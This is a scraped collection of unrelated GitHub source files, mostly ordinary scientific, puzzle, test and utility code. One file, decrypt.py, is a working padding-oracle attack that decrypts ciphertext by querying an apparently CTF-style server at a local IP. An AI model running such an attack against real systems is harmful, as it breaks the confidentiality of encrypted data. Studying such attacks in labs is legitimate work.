+str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\") \n print(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\")\n print(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in coding regions (CDS) = \"+ str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\")\n print(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\")\n else:\n print(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\")\n print(\"------------------------------------------------------------------------------------------------------------------------------------\")\n\n output_gct_file.write(\"\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n output_gct_file.write(\"Whole genome total size = \"+str(genome_size)+\" nucleotides, where \"+ str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_nc_genome_cds/genome_size*100,2)) \\\n +\"%) belongs to coding regions (CDS) and \"+ str(sum_nc_genome_noncod)+\" nucleotides (\"+str(round(sum_nc_genome_noncod/genome_size*100,2))+\"%) belongs to non coding regions (NC)\\n\")\n output_gct_file.write(\"Whole genome GC content = \"+str(sum_GC_nc)+\" of \"+str(genome_size)+\" nucleotides (\"+str(round(sum_GC_nc/genome_size*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in coding regions = \"+str(sum_GC_nc_cds)+\" of \"+str(sum_nc_genome_cds)+\" nucleotides (\"+str(round(sum_GC_nc_cds/sum_nc_genome_cds*100,2))+\"%)\\n\")\n output_gct_file.write(\"GC content in non coding regions = \"+str(sum_GC_nc_noncod)+\" of \"+str(sum_nc_genome_noncod)+\" nucleotides (\" +str(round(sum_GC_nc_noncod/sum_nc_genome_noncod*100,2))+\"%)\\n\") \n output_gct_file.write(\"uORFs total size = \"+ str(sum_nc_ORFs) + \" nucleotides, corresponding to \" + str(round(sum_nc_ORFs/genome_size*100,2))+ \"% \"+\"of whole genome\\n\")\n output_gct_file.write(\"uORfs GC content = \" +str(sum_nc_GC_ORFs)+\" of \"+str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_GC_ORFs/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in coding regions (CDS) = \"+ str(sum_nc_ORFs_cds) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_cds/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs total size in non coding regions (NC) = \"+ str(sum_nc_ORFs_noncod) + \" of \"+ str(sum_nc_ORFs)+\" nucleotides (\"+str(round(sum_nc_ORFs_noncod/sum_nc_ORFs*100,2))+\"%)\\n\")\n output_gct_file.write(\"uORFs GC content in coding regions (CDS) = \" +str(sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_cds) + \" nucleotides (\"+ str(round(sum_nc_GC_ORFs_cds/sum_nc_ORFs_cds*100,2))+\"%)\\n\")\n #Avoid division by 0\n if (sum_nc_ORFs_noncod!=0):\n output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (\"+ \\\n str(round((sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)/(sum_nc_ORFs_noncod)*100,2))+\"%)\\n\")\n else:\n output_gct_file.write(\"uORFs GC content in non coding regions (NC) = \" +str(sum_nc_GC_ORFs-sum_nc_GC_ORFs_cds)+\" of \"+str(sum_nc_ORFs_noncod) + \" nucleotides (0%)\\n\")\n output_gct_file.write(\"------------------------------------------------------------------------------------------------------------------------------------\\n\")\n\n#Calculate GC content in whole Genome\ndef wholeGenomeGCCalc(output_csv_file,output_gct_file,whole_genome, genome_array):\n #Total of nucleotides in the whole genome that belongs to coding regions\n sum_nc_genome_cds=0\n #Total of nucleotides in the whole genome that belongs to non coding regions\n sum_nc_genome_noncod=0\n #Total of GC nucleotides in the whole genome that belongs to coding regions\n sum_GC_nc_cds=0\n #Total of GC nucleotides in the whole genome\n sum_GC_nc=0\n\n for i in range(1,len(genome_array)):\n output_csv_file.write(str(genome_array[i])+\"\\n\")\n if (checkCG(whole_genome[i])):\n sum_GC_nc=sum_GC_nc+1\n #Check if nucleotide is part of coding region\n #uORFs nucleotides adds +10 to genome_array and gene coding regions derived form cds file adds +1\n #So we get the remainder of division by 10\n if (genome_array[i]%10>0):\n sum_GC_nc_cds= sum_GC_nc_cds+1\n sum_nc_genome_cds=sum_nc_genome_cds+1\n elif (genome_array[i]%10>0):\n sum_nc_genome_cds=sum_nc_genome_cds+1\n\n return sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc\n\n\ndef main():\n\n uORFs_file,cds_file,fasta_file,output_gct_file,output_csv_file =checkInputFiles()\n\n #Call function that reads data from 'cds' file, creating genome_array\n genome_size,genome_array = createGenomeArray(cds_file)\n\n #Call function to read whole genome from fasta file\n whole_genome=readWholeGenome(fasta_file)\n\n #Call function to calculate GC Content of uORfs\n sum_nc_GC_ORFs, sum_nc_GC_ORFs_cds, sum_nc_ORFs, sum_nc_ORFs_cds,sum_size_uorfs_noncod=uORFsFileGCCalc(uORFs_file,genome_array,output_gct_file)\n\n #Call function to calculate GC Content of whole genome\n sum_nc_genome_cds, sum_GC_nc_cds, sum_GC_nc=wholeGenomeGCCalc(output_csv_file,output_gct_file, whole_genome, genome_array)\n sum_nc_genome_noncod=genome_size-sum_nc_genome_cds\n sum_GC_nc_noncod=sum_GC_nc-sum_GC_nc_cds\n\n #Calculate number of ORFs nucleotides in non coding regions\n sum_nc_ORFs_noncod=sum_nc_ORFs-sum_nc_ORFs_cds\n \n #Print final summary\n printSaveFinalSummary(genome_size, sum_nc_genome_cds, sum_nc_genome_noncod, sum_GC_nc, sum_GC_nc_cds, sum_GC_nc_noncod, sum_nc_ORFs, sum_nc_GC_ORFs, sum_nc_ORFs_cds, \\\nsum_nc_GC_ORFs_cds, sum_nc_ORFs_noncod, output_gct_file)\n\n print(\"\\n\\n____________________________________________________________\")\n print(\"\\n\\nResults saved in: \"+str(output_gct_file.name)+\" e \"+str(output_csv_file.name)+\"\\n\")\n print(\"____________________________________________________________\\n\\n\\n\")\n\n uORFs_file.close()\n cds_file.close()\n output_csv_file.close()\n output_gct_file.close()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"paulaluize/mitogenomes","sub_path":"GCContentuORfsCdsCirc.py","file_name":"GCContentuORfsCdsCirc.py","file_ext":"py","file_size_in_byte":19665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8324209012","text":"from dataclasses import dataclass, field\nimport logging\n\nTEST_INPUT = [\n 'FBFBBFFRLR',\n 'BFFFBBFRRR',\n 'FFFBBBFRRR',\n 'BBFFBBFRLL',\n]\n\nNUM_ROWS = 128\nNUM_COLS = 8\n\ndef divide_seats(string, inc_char, seats):\n offset = 0\n logging.debug(string)\n for char in string:\n seats /= 2\n logging.debug(char)\n if char == inc_char:\n offset += seats\n logging.debug(f' upper half: {offset}, +{seats}')\n else:\n logging.debug(f' lower half: {offset}, +0')\n return int(offset)\n\ndef parse_front_back(string, seats=128):\n return divide_seats(string, 'B', seats)\n\ndef parse_left_right(string, seats=8):\n return divide_seats(string, 'R', seats)\n\ndef decode_seat_code(string: str) -> 'Seat':\n row_code = string[:7]\n column_code = string[7:]\n return Seat(parse_front_back(row_code), parse_left_right(column_code))\n\n@dataclass(frozen=True)\nclass Seat:\n\n row: int\n column: int\n seat_id: int = field(init=False)\n\n def __post_init__(self):\n object.__setattr__(self, 'seat_id', (self.row * 8) + self.column)\n\n\ndef tests():\n print('Tests\\n-----\\n')\n results = [decode_seat_code(code) for code in TEST_INPUT]\n print(results)\n\ndef main():\n print('Main\\n----\\n')\n\n with open(\"input_1.txt\", 'r') as input_file:\n results = [decode_seat_code(code.strip()) for code in input_file.readlines()]\n\n print('Max seat ID: ', max(s.seat_id for s in results))\n \n all_seats = {Seat(row, column) for row in range(NUM_ROWS) for column in range(NUM_COLS)}\n missing_seats = all_seats.difference(results)\n results = sorted(missing_seats, key=lambda e: e.row)\n for r in results:\n print(r)\n\n\nif __name__ == '__main__':\n tests()\n print('')\n main()\n","repo_name":"rpw505/aoc_2020","sub_path":"day_05/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33190270487","text":"import numpy as np\n\nfrom chemtools.wrappers.molecule import Molecule\nfrom chemtools.utils.cube import UniformGrid\n\n\nhelp_cube = \"\"\"\ncubic grid used for evaluation and visualization.\nThis can be either a cube file with .cube extension, or a user-defined\ncubic grid specified by comma-separated spacing and extension values,\ne.g., 0.2,5.0 specifies 0.2 a.u. distance between grid points, and 5.0 a.u.\nextension on each side of molecule. [default=%(default)s]\n\"\"\"\n\n\ndef load_molecule_and_grid(fname, cube):\n \"\"\"Return instances of molecule and uniform cubic grid.\n\n Parameters\n ----------\n fname : str\n Path to wave-function file.\n cube : str\n Uniform cubic grid specifications.\n\n \"\"\"\n # load molecule\n mol = Molecule.from_file(fname)\n\n if cube.endswith(\".cube\"):\n # load & check cube file\n cube = UniformGrid.from_cube(cube)\n if np.allclose(mol.numbers, cube.numbers):\n raise ValueError(\"Atomic number in {0} & {1} should be the same!\".format(fname, cube))\n if np.allclose(mol.coordinates, cube.coordinates):\n raise ValueError(\n \"Atomic coordinates in {0} & {1} should be the same!\".format(cube.fname, cube.cube)\n )\n elif len(cube.split(\",\")) == 2:\n # make a cubic grid\n spacing, extension = [float(item) for item in cube.split(\",\")]\n cube = UniformGrid.from_molecule(mol, spacing=spacing, extension=extension, rotate=True)\n\n else:\n raise ValueError(\"Argument cube={0} is not recognized!\".format(cube))\n\n return mol, cube\n","repo_name":"theochem/chemtools","sub_path":"chemtools/scripts/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"}
+{"seq_id":"32795615141","text":"def _compile_single(ctx):\n yasm_path = \"yasm \"\n args = []\n\n if ctx.attr.arch == \"x64\":\n args += [\"-felf64\", \"-D__x86_64__\", \"-DELF\"]\n else:\n args += [\"-felf\", \"-D__x86__\", \"-DELF\"]\n\n args += ctx.attr.defines\n\n include_paths = []\n include_paths += [\"-I./\" + e.path for e in ctx.files.includes]\n args += include_paths\n args += [ctx.file.src.path]\n args += [\"-o \", ctx.outputs.out.path]\n\n command = yasm_path + \" \".join(args)\n ctx.action(\n mnemonic = \"YasmCompile\",\n inputs = [ctx.file.src] + ctx.files.deps,\n outputs = [ctx.outputs.out],\n command = command,\n )\n\n return struct(files = set([ctx.outputs.out]))\n\n_yasm_compile_attrs = {\n \"src\": attr.label(allow_files = FileType([\".asm\"]),\n single_file = True),\n \"arch\": attr.string(default = \"x64\"),\n \"includes\": attr.label_list(allow_files = True),\n \"deps\": attr.label_list(allow_files = True),\n \"defines\": attr.string_list(),\n}\n\nyasm_compile = rule(\n _compile_single,\n attrs = _yasm_compile_attrs,\n outputs = {\n \"out\": \"%{name}.o\"\n }\n)\n\ndef yasm_library(name, arch=None, srcs=None, deps=[], includes=[], defines=[], visibility=None):\n yasm_objs = []\n for src in srcs:\n yasm_objs += [yasm_compile(name = src[:-4],\n arch = arch,\n src = src,\n deps = deps,\n includes = includes,\n defines = defines)]\n lablels = [e.label() for e in yasm_objs]\n native.cc_library(\n linkstatic = 1,\n name = name,\n visibility = visibility,\n srcs = lablels\n )\n \n\n\n","repo_name":"baranov1ch/squim","sub_path":"tools/build_rules/yasm.bzl","file_name":"yasm.bzl","file_ext":"bzl","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"19882638668","text":"import subprocess\n\nif __name__ == \"__main__\":\n command = input(\"Introduceti comanda: \")\n command_list = []\n\n for c in command.split(\"|\"):\n command_list.append(filter(lambda c: c != \"\", c.split(\" \")))\n\n prev = subprocess.run(command_list[0], stdout=subprocess.PIPE)\n\n for c in command_list[1:]:\n prev = subprocess.run(c, input=prev.stdout, stdout=subprocess.PIPE)\n\n print(f'{prev.stdout.decode(\"utf-8\")}')\n","repo_name":"Eduard975/PP","sub_path":"Teme/Tema11/Problema2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31103900998","text":"# Print the following pattern for the given number of rows.\n# Assume N is always odd.\n# Note : There is space after every star.\n# Pattern for N = 7\n# *\n# * *\n# * * *\n# * * * *\n# * * *\n# * *\n# *\n\n\nn=int(input())\nn1=(n//2)+1\ni=1\nwhile i<=n1:\n spaces=i-1\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=1\n while star<=i:\n print(\"* \",end=\"\")\n star +=1\n print()\n i=i+1\nn2=n//2\ni=1\nwhile i<=n2:\n spaces=n2-i\n while spaces>=1:\n print(\" \",end=\"\")\n spaces-=1\n star=n2-i+1\n while star>=1:\n print(\"* \",end=\"\")\n star-=1\n print()\n i=i+1\n","repo_name":"LORDFLACKO0087/Python-Codes","sub_path":"Coding Ninjas/Patterns 2/Arrow pattern.py","file_name":"Arrow pattern.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38821540585","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport json\nfrom decimal import Decimal\nfrom pprint import pprint\nfrom loguru import logger\n\ndynamodb = boto3.resource('dynamodb', endpoint_url=\"http://localhost:8000\")\n\n\ndef load_data(devices, dynamodb=None):\n devices_table = dynamodb.Table('Devices')\n # Loop through all the items and load each\n for device in devices:\n device_id = (device['device_id'])\n datacount = device['datacount']\n # Print device info\n print(\"Loading Devices Data:\", device_id, datacount)\n devices_table.put_item(Item=device)\n\n\ndef create_devices_table(dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Table defination\n table = dynamodb.create_table(\n TableName='Devices',\n KeySchema=[\n {\n 'AttributeName': 'device_id',\n 'KeyType': 'HASH' # Partition key\n },\n {\n 'AttributeName': 'datacount',\n 'KeyType': 'RANGE' # Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'device_id',\n # AttributeType defines the data type. 'S' is string type and 'N' is number type\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'datacount',\n 'AttributeType': 'N'\n },\n ],\n ProvisionedThroughput={\n # ReadCapacityUnits set to 10 strongly consistent reads per second\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10 # WriteCapacityUnits set to 10 writes per second\n }\n )\n return table\n\n\ndef create_user_table():\n table_name = 'Users'\n params = {\n 'TableName': table_name,\n 'KeySchema': [\n {'AttributeName': 'partition_key', 'KeyType': 'HASH'},\n {'AttributeName': 'sort_key', 'KeyType': 'RANGE'}\n ],\n 'AttributeDefinitions': [\n {'AttributeName': 'partition_key', 'AttributeType': 'N'},\n {'AttributeName': 'sort_key', 'AttributeType': 'N'}\n ],\n 'ProvisionedThroughput': {\n 'ReadCapacityUnits': 10,\n 'WriteCapcityUnits': 10\n },\n }\n table = dynamodb.create_table(**params)\n logger.info(f\"Creating table: {table_name}\")\n table.wait_until_exists()\n return table\n\n\ndef put_device(device_id, datacount, timestamp, temperature1, temperature2, temperature3, temperature4, temperature5, dynamodb=None):\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table\n devices_table = dynamodb.Table('Devices')\n response = devices_table.put_item(\n # Data to be inserted\n Item={\n 'device_id': device_id,\n 'datacount': datacount,\n 'info': {\n 'info_timestamp': timestamp,\n 'temperature1': temperature1,\n 'temperature2': temperature2,\n 'temperature3': temperature3,\n 'temperature4': temperature4,\n 'temperature5': temperature5\n }\n }\n )\n return response\n\n\ndef get_device(device_id, datacount):\n # Specify the table to read from\n devices_table = dynamodb.Table('Devices')\n\n try:\n response = devices_table.get_item(\n Key={'device_id': device_id, 'datacount': datacount})\n except ClientError as e:\n print(e.response['Error']['Message'])\n else:\n return response['Item']\n\n\ndef scan_devices():\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n # Specify the table to scan\n devices_table = dynamodb.Table('Devices')\n response = devices_table.scan()\n print(response)\n items = response['Items']\n while 'LastEvaluatedKey' in response:\n print(response['LastEvaluatedKey'])\n response = devices_table.scan(ExclusiveStartKey=response['LastEvaluatedKey'])\n items.extend(response['Items'])\n print(items)\n\n\nif __name__ == '__main__':\n # device_table = create_devices_table()\n # Print table status\n # print(\"Status:\", device_table.table_status)\n\n # with open(\"../data.json\") as json_file:\n # device_list = json.load(json_file, parse_float=Decimal)\n # load_data(device_list)\n\n # device_resp = put_device(\"10001\", 3, \"1612522800\",\n # \"23.74\", \"32.56\", \"12.43\", \"44.74\", \"12.74\")\n # print(\"Create item successful.\")\n # # Print response\n # pprint(device_resp)\n\n device = get_device(\"10001\", 3, )\n if device:\n print(\"Get Device Data Done:\")\n # Print the data read\n print(device)\n\n # scan_devices()\n\n","repo_name":"bwlee13/ProjectInit","sub_path":"utils/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27212945163","text":"from django.conf import settings\nfrom django.core.management import call_command\nfrom django.db.models import loading\nfrom django import test\n\n\nclass TestCase(test.TestCase):\n apps = ('flash.tests',)\n tables_created = False\n\n def _pre_setup(self):\n cls = TestCase\n if not cls.tables_created:\n # Add the models to the db.\n cls._original_installed_apps = list(settings.INSTALLED_APPS)\n for app in cls.apps:\n if isinstance(settings.INSTALLED_APPS, tuple):\n settings.INSTALLED_APPS = list(settings.INSTALLED_APPS)\n settings.INSTALLED_APPS.append(app)\n loading.cache.loaded = False\n call_command('syncdb', interactive=False, verbosity=0)\n TestCase.tables_created = True\n\n # Call the original method that does the fixtures etc.\n super(TestCase, self)._pre_setup()\n\n def _post_teardown(self):\n # Call the original method.\n super(TestCase, self)._post_teardown()\n cls = TestCase\n # Restore the settings.\n settings.INSTALLED_APPS = cls._original_installed_apps\n loading.cache.loaded = False\n","repo_name":"HackerEarth/django-flash","sub_path":"flash/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"25407513960","text":"from model import Compra, Cartao, CompraCredito\nfrom datetime import datetime, date\n\nvisa = Cartao('1111 1111 1111 1111', date(2031, 1, 31), '321', 1000.0, 'Steve Rogers')\n\ncompra_farmacia = Compra(100.0, datetime(2023, 1, 1, 10, 0, 0), 'Farmácia Popular', 'Saúde', visa)\ncompra_restaurante = Compra(89.9, datetime(2023, 1, 2, 12, 15, 0), 'Burguer King', 'Lazer', visa)\ncompra_supermercado = Compra(475.5, datetime(2023, 2, 3, 7, 5, 5), 'Carrefour', 'Alimentação', visa)\n\nprint(compra_farmacia)\nprint(compra_restaurante)\nprint(compra_supermercado)\nprint()\n\ncompra_amazon = CompraCredito(1000.0, datetime(2023, 2, 15, 19, 46, 17), 'Amazon', 'Casa', visa, 10)\nprint(f'Compra a crédito: {compra_amazon.valor} em {compra_amazon.quantidade_parcelas}x de {compra_amazon.valor_parcela}')\nprint()\n\nfatura = [compra_farmacia, compra_restaurante, compra_supermercado, compra_amazon]\ntotal = 0\nfor compra in fatura:\n total += compra.valor\n\nprint(f'O total da fatura é: {total}')\n","repo_name":"ThiagoAndrad/levelup-byte-card-python","sub_path":"teste_compra.py","file_name":"teste_compra.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"38158767674","text":"import pygame, random\nfrom PIL import Image\n\n\n# функция создания пазлов\ndef create_puzzles(num, width, height):\n rows = num\n cols = num\n num_cells = rows * cols\n\n cell_width = width // rows\n cell_height = height // cols\n\n cells = []\n rand_indexes = list(range(0, num_cells))\n\n for i in range(num_cells):\n x = (i % rows) * cell_width\n y = (i // cols) * cell_height\n rect = pygame.Rect(x, y, cell_width, cell_height)\n rand_pos = random.choice(rand_indexes)\n rand_indexes.remove(rand_pos)\n cells.append({'rect': rect, 'border': (255, 255, 255), 'order': i, 'pos': rand_pos})\n return [cells, cell_width, cell_height]\n\n\n# функция создания фона для финального экрана\ndef converting(image):\n im_final = image.convert(\"L\")\n im_final.save('final.jpg')\n bg_final = pygame.image.load('final.jpg')\n return bg_final\n\n\n# функция изменения громкости\ndef change_volume(flag, volume):\n if flag:\n if 0 <= volume < 10:\n volume += 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 10:\n return volume\n else:\n if 0 < volume <= 10:\n volume -= 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 0:\n return volume\n","repo_name":"Scut1er/Ultimate-puzzle","sub_path":"defs.py","file_name":"defs.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31791274117","text":"import numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\nfrom matplotlib.axes import Axes\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.svm import SVC\n\nfrom ml_tooling import Model\nfrom ml_tooling.data import load_demo_dataset\nfrom ml_tooling.result import Result\nfrom ml_tooling.utils import VizError\n\n\nclass TestPRCurve:\n @pytest.fixture(scope=\"class\")\n def classifier_result(self) -> Result:\n \"\"\"Setup a classiifer Result\"\"\"\n dataset = load_demo_dataset(\"iris\")\n model = Model(LogisticRegression())\n return model.score_estimator(dataset)\n\n @pytest.fixture(scope=\"class\")\n def ax(self, classifier_result: Result) -> Axes:\n \"\"\"Setup a PR Curve plot\"\"\"\n yield classifier_result.plot.precision_recall_curve()\n plt.close()\n\n def test_plots_can_be_given_an_ax(self, classifier_result: Result):\n \"\"\"Expect a plot to be able to be passed an existing axis and plot on that\"\"\"\n fig, ax = plt.subplots()\n test_ax = classifier_result.plot.precision_recall_curve(ax=ax)\n assert ax == test_ax\n plt.close()\n\n def test_has_the_correct_title(self, ax: Axes):\n \"\"\"Expect the title to reflect the estimator used\"\"\"\n assert ax.title.get_text() == \"Precision-Recall - LogisticRegression\"\n\n def test_has_the_correct_ylabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct y label\"\"\"\n assert ax.get_ylabel() == \"Precision\"\n\n def test_has_the_correct_xlabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct x label\"\"\"\n assert ax.get_xlabel() == \"Recall\"\n\n @pytest.mark.parametrize(\"class_index\", [0, 1, 2])\n def test_pr_curve_have_correct_data(\n self, ax: Axes, classifier_result: Result, class_index\n ):\n \"\"\"Expect the pr curve to have the correct data\"\"\"\n x = classifier_result.plot._data.test_x\n y_true = label_binarize(classifier_result.plot._data.test_y, classes=[0, 1, 2])[\n :, class_index\n ]\n y_proba = classifier_result.estimator.predict_proba(x)[:, class_index]\n\n precision, recall, _ = precision_recall_curve(y_true, y_proba)\n\n assert np.all(recall == ax.lines[class_index].get_xdata())\n assert np.all(precision == ax.lines[class_index].get_ydata())\n plt.close()\n\n def test_pr_curve_fails_correctly_without_predict_proba(self):\n \"\"\"\n Expect that the plot will raise an exception if the estimator\n does not have a predict_proba method\n \"\"\"\n dataset = load_demo_dataset(\"iris\")\n svc = Model(SVC(gamma=\"scale\"))\n result = svc.score_estimator(dataset)\n with pytest.raises(VizError):\n result.plot.precision_recall_curve()\n plt.close()\n\n def test_fails_if_wrong_number_of_labels_passed(self, classifier_result: Result):\n \"\"\"\n Expect the plot to raise if a different number of labels are passed, than there are\n classes in the data\n \"\"\"\n with pytest.raises(VizError):\n classifier_result.plot.precision_recall_curve(labels=[\"one\"])\n","repo_name":"andersbogsnes/ml_tooling","sub_path":"tests/test_visualizations/test_precision_recall_curve.py","file_name":"test_precision_recall_curve.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"17763583101","text":"import socket\nimport time\n\nhost = \"192.168.2.83\"\n\nport = 26151\n\ninvalid = 'invalid padding\\n'\n\ndata = \"5468697320697320616e204956343536069242ad5ac3e289582b09ff2d30032b0e72a2004dc6d37181448f0327a2a3f3fe3280b99951c832ca8d08940716d226af1a2edddadfdbe92a5933f4d869c714e53842a369eb89a44ae1159b3b73f3d3\" ## the cipher we want to decrypt, copy from CTF server terminal\n\n\nblock1 = data[0:32]\nblock2 = data[32:64]\nblock3 = data[64:96]\nblock4 = data[96:128]\nblock5 = data[128:160]\nblock6 = data[160:192]\n\ndef attack_blocks(block1, block2):\n c1 = block1\n c2 = block2\n res = b\"\"\n index = 30\n plain_padding = 1\n Is = []\n for _ in range(16):\n time.sleep(5)\n paddings = [hex(plain_padding ^ I)[2:] for I in Is]\n padding_str = \"\"\n\n for I in Is:\n p = hex(plain_padding ^ I)[2:]\n if len(p) == 1:\n p = '0' + p\n padding_str += p\n\n for i in range(256):\n b = hex(i)[2:]\n if len(b) == 1:\n b = \"0\" + b\n\n c1_ = c1[ : index] + b + padding_str\n print(\"current cipher: \", c1_)\n secret_text = c1_ + c2 + \" \"\n\n s = socket.socket()\n s.connect((host, port))\n s.sendall(secret_text.encode())\n s.shutdown(socket.SHUT_WR)\n\n fragments = []\n while True:\n chunk = s.recv(100)\n if not chunk:\n break\n fragments.append(chunk.decode('utf-8'))\n result = \"\".join(fragments)\n \n s.close()\n\n if result[-16:] != invalid:\n if b == c1[index : index + 2] and plain_padding == 1:\n continue\n I = int(b, 16) ^ plain_padding ##\n Is = [I] + Is\n plain = hex(int(c1[index:index + 2], 16) ^ I)[2:] ##\n if len(plain) == 1:\n plain = '0' + plain\n bytes_obj = bytes.fromhex(plain)\n res = bytes_obj + res\n plain_padding += 1\n index -= 2\n break\n print(\"current block has message: \", res)\n return res\n\n\n\nplain_5 = attack_blocks(block5, block6)\ntime.sleep(5)\nplain_4 = attack_blocks(block4, block5)\ntime.sleep(5)\nplain_3 = attack_blocks(block3, block4)\ntime.sleep(5)\nplain_2 = attack_blocks(block2, block3)\ntime.sleep(5)\nplain_1 = attack_blocks(block1, block2)\n\nprint(\"The plain text is \", plain_1 + plain_2 + plain_3 + plain_4 + plain_5)\n","repo_name":"biankaiwen111/padding_oracles","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18229130641","text":"from typing import List\nimport itertools\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n\n if not digits:\n return None\n\n phone = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n\n\n def divideAndConquer(number):\n\n count_of_digits = len(number)\n\n mid = int(count_of_digits/2)\n\n if mid == 0:\n return phone.get(number[0])\n\n list1 = divideAndConquer(number[0:mid])\n list2 = divideAndConquer(number[mid:])\n\n combo = [''.join(tuple) for tuple in (list(itertools.product(list1,list2)))]\n return combo\n\n return divideAndConquer(digits)\n\n\ndigits = '243'\ns = Solution()\nprint(s.letterCombinations(digits))\n","repo_name":"jayati-naik/Leetcode-Recursion-II","sub_path":"LetterCombinationsD&C.py","file_name":"LetterCombinationsD&C.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
